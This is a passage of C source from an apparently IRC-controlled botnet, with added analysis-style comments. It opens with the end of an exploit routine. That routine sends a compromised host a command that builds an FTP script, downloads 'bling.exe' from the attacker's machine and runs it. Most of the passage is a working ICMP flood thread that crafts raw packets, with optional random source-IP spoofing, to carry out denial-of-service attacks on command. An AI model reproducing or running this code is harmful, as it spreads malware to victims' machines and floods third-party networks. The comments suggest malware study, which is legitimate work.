	// (GetIP of the IRC socket) and run it.
	if (frecv(bSocket, recvbuf, 1600, 0) > 0) {
		Sleep(500);

		_snprintf(cmd_buff, sizeof(cmd_buff),
	//		"tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename);
			"echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n",
		GetIP(exinfo.sock),FTP_PORT);	
	
		if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) {
			fclosesocket(sSocket);
			fclosesocket(bSocket);
			return FALSE;
		}

		fclosesocket(sSocket);
		fclosesocket(bSocket);

		_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
		if (!exinfo.silent)
			irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		addlog(buffer);
		exploit[exinfo.exploit].stats++;

		return TRUE;
	} else
		// Note: neither socket is closed on this path.
		return FALSE;
}
// ICMP flood thread (IRC-driven denial of service), the ICMP counterpart of
// TcpFloodThread.  `param` is an ICMPFLOOD block copied locally; the owner's
// `gotinfo` flag is raised so it may be reused.  Packets are built by hand on
// a raw socket with IP_HDRINCL.  Despite the ECHOREQUEST type name the ICMP
// type and code are random (0..255), so arbitrary ICMP messages are emitted.
// Requires raw-socket privilege; always exits through ExitThread(0).
// Detection notes (constants below): IP ident 1, TTL 128, ICMP seq 1, id in
// 1..240, payload bytes all equal to one random value per packet, and a
// fixed datagram length of sizeof(ECHOREQUEST).
DWORD WINAPI ICMPFloodThread(LPVOID param)
{
	ICMPFLOOD icmpflood = *((ICMPFLOOD *)param);
	ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param;
	icmpfloods->gotinfo = TRUE;

	// szSendBuf is never transmitted; it only feeds the size used in the
	// final rate message.
	char sendbuf[IRCLINE], szSendBuf[60]={0};

	// `static`: one packet buffer shared by every instance of this thread.
	static ECHOREQUEST echo_req;

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
		sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
		clearthread(icmpflood.threadnum);
		ExitThread(0);
	}
	
	// IP_HDRINCL: the kernel must not prepend its own IP header.
	BOOL flag = TRUE; 
	if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { 
		sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
		if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
		clearthread(icmpflood.threadnum);
		ExitThread(0);
	} 

	// Note: the socket opened above is not closed on this exit path.
	if (finet_addr(icmpflood.ip) == INADDR_NONE) {
		sprintf(sendbuf,"[ICMP]: Invalid target IP.");
		if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
		clearthread(icmpflood.threadnum);
		ExitThread(0);
	}

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));	
	ssin.sin_family=AF_INET; 
	ssin.sin_port=fhtons(0); 
	ssin.sin_addr.s_addr=finet_addr(icmpflood.ip); 

	int sent = 0;
	unsigned long start = GetTickCount();

	// Runs for icmpflood.time seconds (wall clock via GetTickCount).
	while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) {
		echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long)); 
		echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST)); 
		echo_req.ipHeader.ident=1; 
		echo_req.ipHeader.frag_and_flags=0; 
		echo_req.ipHeader.ttl=128; 
		echo_req.ipHeader.proto=IPPROTO_ICMP; 
		// IP checksum is left at 0 here; it is not computed anywhere in
		// this function (the stack may or may not fill it in).
		echo_req.ipHeader.checksum=0; 
		// Source address: random 32-bit value when spoofing, otherwise the
		// local address of the bot's IRC socket.
		echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock))));
		echo_req.ipHeader.destIP=ssin.sin_addr.s_addr;
		echo_req.icmpHeader.type = rand()%256;
		echo_req.icmpHeader.subcode = rand()%256;
		echo_req.icmpHeader.id = (rand() % 240) + 1;
		// ICMP checksum is likewise left at 0.
		echo_req.icmpHeader.checksum = 0;
		echo_req.icmpHeader.seq = 1;

		//fill the packet data with a random character..
		memset(echo_req.cData, rand()%255, sizeof(echo_req.cData));
		if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) {
			fclosesocket(ssock);

			_snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError());
			if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); 
			clearthread(icmpflood.threadnum);
			ExitThread(0);
		}
		sent++;
	}
	fclosesocket(ssock);

	// Summary line.  NOTE(review): the byte count uses sizeof(szSendBuf)
	// (60) although sizeof(ECHOREQUEST) was sent, the division by
	// icmpflood.time faults when a zero duration was requested, and the
	// size_t products are printed with %d.
	sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
	if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); 
	clearthread(icmpflood.threadnum);
	ExitThread(0); 
}